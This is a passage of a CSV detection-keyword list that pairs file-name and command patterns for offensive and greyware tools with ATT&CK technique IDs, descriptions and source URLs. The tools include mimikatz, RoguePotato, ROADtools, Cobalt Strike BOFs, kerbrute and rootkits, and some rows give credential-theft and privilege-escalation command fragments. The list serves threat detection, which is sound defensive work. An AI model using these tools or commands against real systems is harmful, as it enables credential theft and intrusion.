Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg serial *CommonsCollections*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg-*-jar-with-dependencies.jar*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*rmg*--yso*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*RMIRegistryExploit.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*rmmod --remove*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*roadrecon plugin *","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon*gather.py*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","0","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon.db*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roadrecon/frontend*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools.git*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*ROADtools-master*","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1355","206","2023-10-04T08:58:38Z","2020-03-28T09:56:08Z" +"*roastinthemiddle -i * -t * -u *.txt -g *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*robertdavidgraham/masscan*","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","1","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"*RobustPentestMacro*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*ROCAVulnerabilityTester*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*rockyou.txt.gz*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","1","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*rockyou.txt.gz*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*rockyou-30000.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*RogueOxidResolver.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.cpp*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.exe*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.sln*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato.zip*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RoguePotato-master*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*RogueSploit*","offensive_tool_keyword","RogueSploit","RogueSploit is an open source automated script made to create a Fake Acces Point. with dhcpd server. dns spoofing. host redirection. browser_autopwn1 or autopwn2 or beef+mitmf","T1534 - T1565 - T1566 - T1573 - T1590","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/h0nus/RogueSploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*RogueWinRM dll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM exe.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RogueWinRM.c*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rookuu/BOFs/*","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","1","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*Root backdoor obtained!*","offensive_tool_keyword","POC","This is a PoC for Nimbuspwn a Linux privilege escalation issue identified by Microsoft as originally described in https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/ (CVE-2022-29799 and CVE-2022-29800)","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/Immersive-Labs-Sec/nimbuspwn","1","0","N/A","N/A","1","21","5","2022-05-05T10:02:27Z","2022-04-27T13:04:33Z" +"*root/SecurityCenter2* -ClassName AntiVirusProduct*","greyware_tool_keyword","powershell","list AV products with powershell","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*root\cimv2:Win32_Implant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*root_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Rootkit.cpp*","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","8","744","176","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" +"*Rootkit.Win64.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword for ransomware","T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497","TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010","N/A","N/A","Ransomware","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*root-shellcode-linux*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rop.find_gadgets*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*RopChain.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*ROPEngine.cpp*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropfuscator *","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","0","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ROPfuscator*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropfuscator-*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropfuscator.*","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","375","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" +"*ropnop/go-windapsearch*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ropnop/kerbrute*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*rottenpotato.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*rottenpotato.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RottenPotatoVulnerable.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*routerpasswords.com/*","offensive_tool_keyword","routerpasswords.com","find default routers passwords","T1110.003 - T1200","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","1","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*routers_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*RouterScan.exe*","greyware_tool_keyword","routerscan","Router Scan is able to find and identify a variety of devices from large number of known routers on your internal network","T1046 - T1083 - T1018 - T1116","TA0007 - TA0010 - TA0003","N/A","N/A","Network Exploitation tools","https://en.kali.tools/?p=244","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*routersploit*","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11407","2303","2023-05-22T21:50:32Z","2016-03-30T11:43:12Z" +"*rpc://* -rpc-mode ICPR -icpr-ca-name *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*rpc::close*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::connect*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::enum*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpc::server*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*rpcattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 